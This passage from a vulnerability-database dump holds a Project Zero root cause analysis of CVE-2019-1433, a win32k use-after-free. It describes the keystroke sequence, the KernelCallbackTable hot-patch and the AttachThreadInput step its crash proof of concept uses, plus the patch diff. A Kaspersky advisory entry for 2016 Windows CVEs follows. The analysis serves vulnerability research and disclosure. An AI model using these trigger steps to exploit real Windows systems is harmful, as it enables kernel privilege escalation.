[[blog](<https://blog.trendmicro.com/trendlabs-security-intelligence/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild/>)]\n\n * This was an analysis of a vulnerability also related to xxxNextWindow. This blog helped me ultimately figure out how to trigger xxxNextWindow and some argument types of other functions.\n\n * \u201cKernel exploitation \u2013 r0 to r3 transitions via KeUserModeCallback\u201d by Mateusz Jurczyk [[blog](<https://j00ru.vexillium.org/2010/09/kernel-exploitation-r0-to-r3-transitions-via-keusermodecallback/>)]\n\n * This blog helped me figure out how to modify the dispatch table pointer with my own function so that I could execute during the user-mode callback.\n\n * \u201cWindows Kernel Reference Count Vulnerabilities - Case Study\u201d by Mateusz Jurczyk, Zero Nights 2012 [[slides](<https://j00ru.vexillium.org/slides/2012/zeronights.pdf>)]\n\n * \u201cAnalyzing local privilege escalations in win32k\u201d by mxatone, Uninformed v10 (10/2008) [[article](<http://uninformed.org/?v=10&a=2>)]\n\n * P0 Team Members: James Forshaw, Tavis Ormandy, Mateusz Jurczyk, and Ben Hawkes\n\n# TIMELINE\n\n * Oct 31 2019: Chrome releases fix for CVE-2019-13720\n\n * Dec 10 2019: Microsoft Security Bulletin lists CVE-2019-1458 as exploited in the wild and fixed in the December updates. \n\n * Dec 10-16 2019: I ask around for a copy of the exploit. No luck!\n\n * Dec 16 2019: I begin setting up a Windows 7 kernel debugging environment. (And 2 days work on a different project.)\n\n * Dec 23 2019: VM is set-up. Start patch diffing\n\n * Dec 24-Jan 2: Holiday\n\n * Jan 2 - Jan 3: Look at other diffs that weren\u2019t the vulnerability. Try to trigger DrawSwitchWndHilite\n\n * Jan 6: Realize changes to xxxKeyEvent and xxxNextWindow is the correct change. (Note dear reader, this is not in fact the \u201ccorrect change\u201d.)\n\n * Jan 6-Jan16: Figure out how the vulnerability works, go down random rabbit holes, work on POC.\n\n * Jan 16: Crash POC crashes!\n\n** \n**\n\nApproximately 3 work weeks to set up a test environment, diff patches, and create crash POC. \n\n# CVE-2019-1458 CVE-2019-1433 ROOT CAUSE ANALYSIS\n\nBug class: use-after-free\n\n** \n**\n\n## OVERVIEW\n\nThe vulnerability is a use-after-free of a tagQ object in xxxNextWindow, freed during a user mode callback. (The xxx prefix on xxxNextWindow means that there is a callback to user-mode.) The function xxxKeyEvent is the only function that calls xxxNextWindow and it calls xxxNextWindow with a pointer to a tagQ object as the first argument. Neither xxxKeyEvent nor xxxNextWindow lock the object to prevent it from being freed during any of the user-mode callbacks in xxxNextWindow. After one of these user-mode callbacks (xxxMoveSwitchWndHilite), xxxNextWindow then uses the pointer to the tagQ object without any verification, causing a use-after free.\n\n## DETAILED WALK THROUGH\n\nThis section will walk through the vulnerability on Windows 7. I analyzed the Windows 7 patches instead of Windows 10 as explained above in the process section. The Windows 7 crash POC that I developed is available [here](<https://drive.google.com/file/d/1V9HHljjRq17hnfqasExnCiGCJLkt0aOX/view>).\n\n### ANALYZED SAMPLES\n\nI did the diff and analysis between the September and December 2019 updates of win32k.sys as explained in the \u201cMy Process\u201d section.\n\n** \n**\n\nVulnerable win32k.sys (Sept 2019): 9dafa6efd8c2cfd09b22b5ba2f620fe87e491a698df51dbb18c1343eaac73bcf (SHA-256)\n\nPatched win32k.sys (December 2019): b22186945a89967b3c9f1000ac16a472a2f902b84154f4c5028a208c9ef6e102 (SHA-256)\n\n** \n**\n\n### OVERVIEW\n\nThis walk through is broken up into the following sections to describe the vulnerability:\n\n * Triggering xxxNextWindow\n\n * Freeing the tagQ (queue) structure\n\n * User-mode callback xxxMoveSwitchWndHilite\n\n * Using the freed queue\n\n### TRIGGERING xxxNextWindow\n\nThe code path is triggered by a special set of keyboard inputs to open a \u201cSticky Task Switcher\u201d window. As a side note, I didn\u2019t find a way to manually trigger the code path, only programmatically (not that an individual writing an EoP would need it to be triggered manually). To trigger xxxNextWindow, my proof-of-concept (POC) sends the following keystrokes using the SendInput API: \n\n\n&lt;ALT (Extended)&gt; \\+ TAB + TAB release + ALT + CTRL + TAB + release all except ALT extended + TAB. (See triggerNextWindow function in POC). \n\n** \n**\n\nThe \u201cnormal\u201d way to trigger the task switch window is with ALT + TAB, or ALT+CTRL+TAB for \u201csticky\u201d. However, this window won\u2019t hit the vulnerable code path, xxxNextWindow. The \u201cnormal\u201d task switching window, shown below, looks different from the task switching window displayed when the vulnerable code path is being executed. Shown below is the \u201cnormal\u201d task switch window that is displayed when ALT+TAB [+CTRL] are pressed and xxxNextWindow is NOT triggered. The window that is shown when xxxNextWindow is triggered is shown below that. \n \n \n\n\n[](<https://1.bp.blogspot.com/-o4XFRI3CfJE/Xpto6UevWII/AAAAAAAAPh0/HCRz20rFYRgjy6QGC9m1uvKdadZU-uh5ACNcBGAsYHQ/s1600/6_NormalTaskSwitcher%2B%25281%2529.png>)\n\n \n\n\n \n \n\n\n\"Normal\" task switch window\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-RJX4C9GRLdU/Xpto6mHp-YI/AAAAAAAAPh4/yWKpyz52hY0VX6rL7NgS8gvZR2H9mr1vgCNcBGAsYHQ/s1600/7_NextWindowTaskSwitcher%2B%25281%2529.png>)\n\n \n\n\n \n\n\nWindow that is displayed when xxxNextWindow is called\n\n \nIf this is the first \u201ctab press\u201d then the task switch window needs to be drawn on the screen. This code path through xxxNextWindow is not the vulnerable one. The next time you hit TAB, after the window has already been drawn on the screen, when the rectangle should move to the next window, is when the vulnerable code in xxxNextWindow can be reached. \n\n** \n**\n\n### FREEING THE QUEUE in xxxNextWindow\n\nxxxNextWindow takes a pointer to a queue (tagQ struct) as its first argument. This tagQ structure is the object that we will use after it is freed. We will free the queue in a user-mode callback from the function. \n\n** \n**\n\nAt LABEL_106 below (xxxNextWindow+0x847), the queue is used without verifying whether or not it still exists. The only way to reach LABEL_106 in xxxNextWindow is from the branch at xxxNextWindow+0x842. This means that our only option for a user-callback mode is in the function xxxMoveSwitchWndHilite. xxxMoveSwitchWndHilite is responsible for moving the little box within the task switch window that highlights the next window. \n\n** \n**\n\nvoid __fastcall xxxNextWindow(tagQ *queue, int a2) {\n\n[...]\n\n \n\n\nV43 = 0;\n\nwhile ( 1 ) {\n\nif (gspwndAltTab-&gt;fnid &amp; 0x3FFF == 0x2A0 &amp;&amp;\n\ngspwndAltTab-&gt;cbwndExtra + 0x128 == gpsi-&gt;mpFnid_serverCBWndProc[6] &amp;&amp;\n\ngspwndAltTab-&gt;bDestroyed == 0 )\n\nv45 = *(switchWndStruct **)(gspwndAltTab + 0x128);\n\nelse\n\nv45 = 0i64;\n\nif ( !v45 ) {\n\nThreadUnlock1();\n\ngoto LABEL_106;\n\n}\n\nhandleOfNextWindowToHilite = xxxMoveSwitchWndHilite(v8, v45, isShiftPressed2); \u2190 USER MODE CALLBACK\n\nif ( v43 )\n\n{\n\nif ( v43 == handleOfNextWindowToHilite ) {\n\nv48 = 0i64;\n\nLABEL_103:\n\nThreadUnlock1();\n\nHMAssignmentLock(&amp;gspwndActivate, v48);\n\nif ( !*(_QWORD *)&amp;gspwndActivate )\n\nxxxCancelCoolSwitch();\n\nreturn;\n\n}\n\n} else { v43 = handleOfNextWindowToHilite; }\n\ntagWndPtrOfNextWindow = HMValidateHandleNoSecure(handleOfNextWindowToHilite, TYPE_WINDOW);\n\nif ( tagWndPtrOfNextWindow )\n\ngoto LABEL_103;\n\nisShiftPressed2 = isShiftPressed;\n\n}\n\n \n\n\n[...]\n\n \n\n\nLABEL_106:\n\nv11 = queue-&gt;spwndActive; \u2190 USE AFTER FREE\n\nif ( v11 || (v11 = queue-&gt;ptiKeyboard-&gt;rpdesk-&gt;pDeskInfo-&gt;spwnd-&gt;spwndChild) != 0i64 ) {\n\n \n\n\n[...] \n \n--- \n \n** \n**\n\n#### USER-MODE CALLBACK in xxxMoveSwitchWndHilite\n\nThere are quite a few different user-mode callbacks within xxxMoveSwitchWndHilite. Many of these could work, but the difficulty is picking one that will reliably return to our POC code. I chose the call to xxxSendMessageTimeout in DrawSwitchWndHilite.\n\n** \n**\n\nThis call is sending the message to the window that is being highlighted in the task switch window by xxxMoveSwitchWndHilite. Therefore, if we create windows in our POC, we can ensure that our POC will receive this callback.\n\n** \n**\n\nxxxMoveSwitchWndHilite sends message 0x8C which is WM_LPKDRAWSWITCHWND. This is an undocumented message and thus it\u2019s not expected that user applications will respond to this message. Instead, there is a user-mode function that is automatically dispatched by ntdll!KiUserCallbackDispatcher. The user-mode callback for this message is user32!_fnINLPKDRAWSWITCHWND. In order to execute code during this callback, in the POC we hot-patch the PEB.KernelCallbackTable, using the methodology documented [here](<https://j00ru.vexillium.org/2010/09/kernel-exploitation-r0-to-r3-transitions-via-keusermodecallback/>). \n\n** \n**\n\nIn the callback, we free the tagQ structure using [AttachThreadInput](<https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-attachthreadinput>). AttachThreadInput \u201cattaches the input processing mechanism of one thread to that of another thread\u201d and to do this, it destroys the queue of the thread that is being attached to another thread\u2019s input. The two threads then share a single queue. In the callback, we also have to perform the following operations to force execution down the code path that will use the now freed queue:\n\n 1. xxxMoveSwitchWndHilite returns the handle of the next window it should highlight. When this handle is passed to HMValidateHandleNoSecure, it needs to return 0. Therefore, in the callback we need to destroy the window that is going to be highlighted. When HMValidateHandleNoSecure returns 0, we\u2019ll loop back to the top of the while loop.\n\n 2. Once we\u2019re back at the top of the while loop, in the following code block we need to set v45 to 0. There appear to be two options: fail the check such that you go in the else block or set the extra data in the tagWND struct to 0 using SetWindowLongPtr. The SetWindowLongPtr method doesn\u2019t work because this window is a special system class (fnid == 0x2A0). Therefore, we must fail one of the checks and end up in the else block in order to be in the code path that will allow us to use the freed queue.\n\n** \n**\n\nif (gspwndAltTab-&gt;fnid &amp; 0x3FFF == 0x2A0 &amp;&amp;\n\ngspwndAltTab-&gt;cbwndExtra + 0x128 == gpsi-&gt;mpFnid_serverCBWndProc[6] &amp;&amp;\n\ngspwndAltTab-&gt;bDestroyed == 0 )\n\nv45 = *(switchWndStruct **)(gspwndAltTab + 0x128);\n\nelse\n\nv45 = 0i64; \n \n--- \n \n** \n**\n\n### USING THE FREED QUEUE\n\nOnce v45 is set to 0, the thread is unlocked and execution proceeds to LABEL_106 (xxxNextWindow + 0x847) where mov r14, [rbp+50h] is executed. rbp is the tagQ pointer so we dereference it and move it into r14. Therefore we now have a use-after-free.\n\n** \n**\n\n## WINDOWS 10 \n\nCVE-2019-1433 also affected Windows 10 builds. I did not analyze any Windows 10 builds besides 1903.\n\n** \n**\n\nVulnerable (Oct 2019) win32kfull.sys: c2e7f733e69271019c9e6e02fdb2741c7be79636b92032cc452985cd369c5a2c (SHA-256)\n\nPatched (Nov 2019) win32kfull.sys: 15c64411d506707d749aa870a8b845d9f833c5331dfad304da8828a827152a92 (SHA-256)\n\n** \n**\n\nI confirmed that the vulnerability existed on Windows 10 1903 as of the Oct 2019 patch by triggering the use-after-free with Driver Verifier enabled on win32kfull.sys. Below are excerpts from the crash.\n\n** \n**\n\n*******************************************************************************\n\n* *\n\n* Bugcheck Analysis *\n\n* *\n\n*******************************************************************************\n\n \n\n\nPAGE_FAULT_IN_NONPAGED_AREA (50)\n\nInvalid system memory was referenced. This cannot be protected by try-except.\n\nTypically the address is just plain bad or it is pointing at freed memory.\n\n \n\n\nFAULTING_IP:\n\nwin32kfull!xxxNextWindow+743\n\nffff89ba`965f553b 4d8bbd80000000 mov r15,qword ptr [r13+80h]\n\n \n\n\n# Child-SP RetAddr Call Site\n\n00 ffffa003`81fe5f28 fffff806`800aa422 nt!DbgBreakPointWithStatus\n\n01 ffffa003`81fe5f30 fffff806`800a9b12 nt!KiBugCheckDebugBreak+0x12\n\n02 ffffa003`81fe5f90 fffff806`7ffc2327 nt!KeBugCheck2+0x952\n\n03 ffffa003`81fe6690 fffff806`7ffe4663 nt!KeBugCheckEx+0x107\n\n04 ffffa003`81fe66d0 fffff806`7fe73edf nt!MiSystemFault+0x1d6933\n\n05 ffffa003`81fe67d0 fffff806`7ffd0320 nt!MmAccessFault+0x34f\n\n06 ffffa003`81fe6970 ffff89ba`965f553b nt!KiPageFault+0x360 \n\n07 ffffa003`81fe6b00 ffff89ba`965aeb35 win32kfull!xxxNextWindow+0x743 \u2190 UAF\n\n08 ffffa003`81fe6d30 ffff89ba`96b9939f win32kfull!EditionHandleAndPostKeyEvent+0xab005\n\n09 ffffa003`81fe6e10 ffff89ba`96b98c35 win32kbase!ApiSetEditionHandleAndPostKeyEvent+0x15b\n\n0a ffffa003`81fe6ec0 ffff89ba`96baada5 win32kbase!xxxUpdateGlobalsAndSendKeyEvent+0x2d5\n\n0b ffffa003`81fe7000 ffff89ba`96baa7fb win32kbase!xxxKeyEventEx+0x3a5\n\n0c ffffa003`81fe71d0 ffff89ba`964e3f44 win32kbase!xxxProcessKeyEvent+0x1ab\n\n0d ffffa003`81fe7250 ffff89ba`964e339b win32kfull!xxxInternalKeyEventDirect+0x1e4\n\n0e ffffa003`81fe7320 ffff89ba`964e2ccd win32kfull!xxxSendInput+0xc3\n\n0f ffffa003`81fe7390 fffff806`7ffd3b15 win32kfull!NtUserSendInput+0x16d\n\n10 ffffa003`81fe7440 00007ffb`7d0b2084 nt!KiSystemServiceCopyEnd+0x25\n\n11 0000002b`2a5ffba8 00007ff6`a4da1335 win32u!NtUserSendInput+0x14\n\n12 0000002b`2a5ffbb0 00007ffb`7f487bd4 WizardOpium+0x1335 &lt;\\- My POC\n\n13 0000002b2a5ffc10 00007ffb7f86ced1 KERNEL32!BaseThreadInitThunk+0x14\n\n14 0000002b2a5ffc40 0000000000000000 ntdll!RtlUserThreadStart+0x21\n\n \n\n\nBUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202 \n \n--- \n \n** \n**\n\nTo trigger the crash, I only had to change two things in the Windows 7 POC:\n\n 1. The keystrokes are different to trigger the xxxNextWindow task switch window on Windows 10. I was able to trigger it by smashing CTRL+ALT+TAB while the POC was running (and triggering the normal task switch Window). It is possible to do this programmatically, I just didn\u2019t take the time to code it up.\n\n 2. Overwrite index 0x61 instead of 0x57 in the KernelCallbackTable.\n\n** \n**\n\nIt took me about 3 hours to get the POC to trigger Driver Verifier on Windows 10 1903 regularly (about every 3rd time it's run). \n\n[](<https://1.bp.blogspot.com/-DD9YxDSuvMo/Xpto6z2kcgI/AAAAAAAAPh8/Fl0ZjWF3vP4BGzmFhGrFkWBk_QKLfAhZwCNcBGAsYHQ/s1600/8_SidebySideDisasm2%2B%25281%2529.png>) \n \n--- \n \nDisassembly at xxxNextWindow+737 in Oct 2019 Update\n\n| \n\nDisassembly at xxxNextWindow+73F in Nov 2019 Update \n \n** \n**\n\nThe fix in the November update for Windows 10 1903 is the same as the Windows 7 fix: \n\n * Add the UnlockQueue function.\n\n * Add locking around the call to xxxNextWindow.\n\n * Check the \u201cdestroyed\u201d bitflag in the tagQ struct before proceeding to use the queue. \n\n** \n**\n\n# FIXING THE VULNERABILITY\n\nTo patch the CVE-2019-1433 vulnerability, Microsoft changed four functions: \n\n * xxxNextWindow\n\n * xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10)\n\n * zzzDestroyQueue\n\n * UnlockQueue (new function)\n\n** \n**\n\nOverall, the changes are to prevent the queue structure from being freed and track if something attempted to destroy the queue. The addition of the new function, UnlockQueue, suggests that there were no previous locking mechanisms for queue objects. \n\n** \n**\n\n## zzzDestroyQueue Patch\n\nThe only change to the zzzDestroyQueue function in win32k is that if the refcount on the tagQ structure (tagQ.cLockCount) is greater than 0 (keeping the queue from being freed immediately), then the function now sets a bit in tagQ.QF_flags. \n\n\n \n\n\n \n\n\n[](<https://1.bp.blogspot.com/-AfAFuVQf9ik/Xpto7GVoiTI/AAAAAAAAPiA/gHmTpfZvZRYzVnJsQgfaYrzLKBPHbSuZQCNcBGAsYHQ/s1600/9_DestroyQueueBindiff%2B%25281%2529.png>)\n\n \n\n\n \n\n\nzzzDestroyQueue Pre-Patch\n\n \n\n\n[](<https://1.bp.blogspot.com/-fqYi_u0Zxw8/Xpto7V4HOoI/AAAAAAAAPiE/Hu_tMFWdhnAMbn0CaOd4K_579uEBwQJMgCNcBGAsYHQ/s1600/A_DestroyQueueBindiff%25232%2B%25281%2529.png>)\n\n \n\n\n \n\n\nzzzDestroyQueue Post-Patch\n\n \n\n\nxxxNextWindow Patch\n\nThere is a single change to the xxxNextWindow function as shown by the BinDiff graph below. When execution is about to use the queue again (at what was LABEL_106 in the vulnerable version), a check has been added to see if a bitflag in tagQ.QF_flags is set. The instructions added to xxxNextWindow+0x847 are as follows where rbp is the pointer to the tagQ structure.\n\n** \n**\n\nbt dword ptr [rbp+13Ch], 1Ah\n\njb loc_FFFFF9600017A0C9 \n \n--- \n \n** \n**\n\nIf the bit is set, the function exists. If the bit is not set, the function continues and will use the queue. The only place this bit is set is in zzzDestroyQueue. The bit is set when the queue was destroyed, but couldn't be freed immediately because its refcount (tagQ.cLockCount) is greater than 0. Setting the bit is a new change to the code base as described in the section above. \n\n** \n**\n\n[](<https://1.bp.blogspot.com/-BGo0hE2WvZE/Xpto7nBs7XI/AAAAAAAAPiI/hWcK8Db2YZ8yAtB4EOL_R0cHJtxfD-wEACNcBGAsYHQ/s1600/B_xxxNextWindowChanges%2B%25281%2529.png>)\n\n** \n**\n\n## xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10) Patch\n\nIn this section I will simply refer to the function as xxxKeyEvent since Windows 7 was the main platform analyzed. However, the changes are also found in the EditionHandleAndPostKeyEvent function in Windows 10. \n\n** \n**\n\nThe change to xxxKeyEvent is to thread lock the queue that is passed as the first argument to xxxNextWindow. Thread locking doesn\u2019t appear to be publicly documented by Microsoft. My understanding comes from Tarjei Mandt\u2019s 2011 Blackhat USA presentation, \u201c[Kernel Attacks through User-Mode Callbacks](<https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf>)\u201d. Thread locking is where objects are added to a thread\u2019s lock list, and their ref counter is increased in the process. This prevents them from being freed while they are still locked to the thread. \n\n** \n**\n\nThe new function, UnlockQueue, is used to unlock the queue. \n\n** \n**\n\nif ( !queue )\n\nqueue = gptiRit-&gt;pq;\n\nxxxNextWindow(queue, vkey_cp); \n \n--- \n \nxxxKeyEvent+92E Pre-Patch\n\n** \n**\n\nif ( !queue )\n\nqueue = gptiRit-&gt;pq;\n\n++queue-&gt;cLockCount;\n\ncurrWin32Thread = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v62);\n\nthreadLockW32 = currWin32Thread-&gt;ptlW32;\n\ncurrWin32Thread-&gt;ptlW32 = (_TL *)&amp;threadLockW32;\n\nqueueCp = queue;\n\nunlockQueueFnPtr = (void (__fastcall *)(tagQ *))UnlockQueue;\n\nxxxNextWindow(queue, vkey_cp);\n\ncurrWin32Thread2 = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v64);\n\ncurrWin32Thread2-&gt;ptlW32 = threadLockW32;\n\nunlockQueueFnPtr(queueCp); \n \n--- \n \nxxxKeyEvent+94E Post-Patch\n\n** \n**\n\n# CONCLUSION\n\nSo...I got it wrong. Based on the details provided by Kaspersky in their blog post, I attempted to patch diff the vulnerability in order to do a root cause analysis. It was only based on the feedback from Microsoft (Thanks, Microsoft!) and their guidance to look at the InitFunctionTables method, that I realized I had analyzed a different bug. I analyzed CVE-2019-1433 rather than CVE-2019-1458, the vulnerability exploited in the wild. The real root cause analysis for CVE-2019-1458 was documented by @florek_pl [here](<https://github.com/piotrflorczyk/cve-2019-1458_POC>).\n\n** \n**\n\nIf I had patch-diffed November 2019 to December 2019 rather than September to December, then I wouldn\u2019t have analyzed the wrong bug. This seems obvious after the fact, but when just starting out, I thought that maybe Windows 7, being so close to end of life, didn\u2019t get updates every single month. Now I know to not only rely on Windows Update, but also to look for KB articles and that I can download additional updates from the Microsoft Update Catalog.\n\n** \n**\n\nAlthough this blog post didn\u2019t turn out how I originally planned, I decided to share it in the hopes that it\u2019d encourage others to explore a platform new to them. It\u2019s often not a straight path, but if you\u2019re interested in Windows kernel research, this is how I got started. In addition, I think this was a fun and quite interesting bug!\n\n** \n**\n\nI didn\u2019t initially set out to do a patch diffing exercise on this vulnerability, but I do think that this work gives us another data point to use in disclosure discussions. It took me, someone with reversing, but no Windows experience, three weeks to understand the vulnerability and write a proof-of-concept. While I ended up doing this analysis for a vulnerability other than the one I intended, many attackers are not looking to patch-diff a specific vulnerability, but rather any vulnerability that they could potentially exploit. Therefore, I think that three weeks can be used as an approximate high upper bound since most attackers looking to use this technique will have more experience.\n\n \n\n", "modified": "2020-04-02T00:00:00", "published": "2020-04-02T00:00:00", "id": "GOOGLEPROJECTZERO:C2A64C2133DFD2ACB457C2DD2790CBF7", "href": "https://googleprojectzero.blogspot.com/2020/04/tfw-you-get-really-excited-you-patch.html", "type": "googleprojectzero", "title": "\nTFW you-get-really-excited-you-patch-diffed-a-0day-used-in-the-wild-but-then-find-out-it-is-the-wrong-vuln\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:48:11", "bulletinFamily": "info", "cvelist": ["CVE-2016-7221", "CVE-2016-7239", "CVE-2016-7195", "CVE-2016-7184", "CVE-2016-3338", "CVE-2016-3334", "CVE-2016-7216", "CVE-2016-7227", "CVE-2016-7237", "CVE-2016-7246", "CVE-2016-7248", "CVE-2016-7199", "CVE-2016-3335", "CVE-2016-7218", "CVE-2016-7210", "CVE-2016-7214", "CVE-2016-3343", "CVE-2016-3333", "CVE-2016-7202", "CVE-2016-0026", "CVE-2016-7198", "CVE-2016-7205", "CVE-2016-7256", "CVE-2016-7238", "CVE-2016-3332", "CVE-2016-7255", "CVE-2016-3342", "CVE-2016-7215", "CVE-2016-7212", "CVE-2016-3340"], "description": "### *Detect date*:\n11/08/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information, execute arbitrary code, cause denial of service.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows Vista Service Pack 2 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2012 \nWindows RT 8.1 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 for 32-bit Systems \nInternet Explorer 9 \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 \nMicrosoft Windows Hyperlink Object Library \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2012 R2 \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nInternet Explorer 10 \nInternet Explorer 11 \nWindows Vista x64 Edition Service Pack 2 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nMicrosoft Edge (EdgeHTML-based)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2016-7216](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7216>) \n[CVE-2016-7214](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7214>) \n[CVE-2016-7215](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7215>) \n[CVE-2016-7212](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7212>) \n[CVE-2016-7210](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7210>) \n[CVE-2016-7218](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7218>) \n[CVE-2016-3340](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3340>) \n[CVE-2016-3342](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3342>) \n[CVE-2016-3343](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3343>) \n[CVE-2016-7195](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7195>) \n[CVE-2016-7248](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7248>) \n[CVE-2016-7199](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7199>) \n[CVE-2016-7198](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7198>) \n[CVE-2016-7246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7246>) \n[CVE-2016-7205](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7205>) \n[CVE-2016-7221](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7221>) \n[CVE-2016-7227](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7227>) \n[CVE-2016-7202](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7202>) \n[CVE-2016-3333](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3333>) \n[CVE-2016-3332](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3332>) \n[CVE-2016-3335](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3335>) \n[CVE-2016-3334](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3334>) \n[CVE-2016-3338](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3338>) \n[CVE-2016-0026](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-0026>) \n[CVE-2016-7184](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7184>) \n[CVE-2016-7238](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7238>) \n[CVE-2016-7239](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7239>) \n[CVE-2016-7237](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7237>) \n[CVE-2016-7256](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7256>) \n[CVE-2016-7255](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7255>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2016-7239](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7239>)0.0Unknown \n[CVE-2016-7227](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7227>)0.0Unknown \n[CVE-2016-7195](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7195>)0.0Unknown \n[CVE-2016-7198](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7198>)0.0Unknown \n[CVE-2016-7199](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7199>)0.0Unknown \n[CVE-2016-7202](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7202>)0.0Unknown \n[CVE-2016-7256](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7256>)0.0Unknown \n[CVE-2016-7255](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255>)0.0Unknown \n[CVE-2016-7248](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7248>)0.0Unknown \n[CVE-2016-7246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7246>)0.0Unknown \n[CVE-2016-7238](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7238>)0.0Unknown \n[CVE-2016-7237](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7237>)0.0Unknown \n[CVE-2016-0026](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0026>)0.0Unknown \n[CVE-2016-3332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3332>)0.0Unknown \n[CVE-2016-3333](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3333>)0.0Unknown \n[CVE-2016-3334](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3334>)0.0Unknown \n[CVE-2016-3335](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3335>)0.0Unknown \n[CVE-2016-3338](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3338>)0.0Unknown \n[CVE-2016-3340](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3340>)0.0Unknown \n[CVE-2016-3342](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3342>)0.0Unknown \n[CVE-2016-3343](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3343>)0.0Unknown 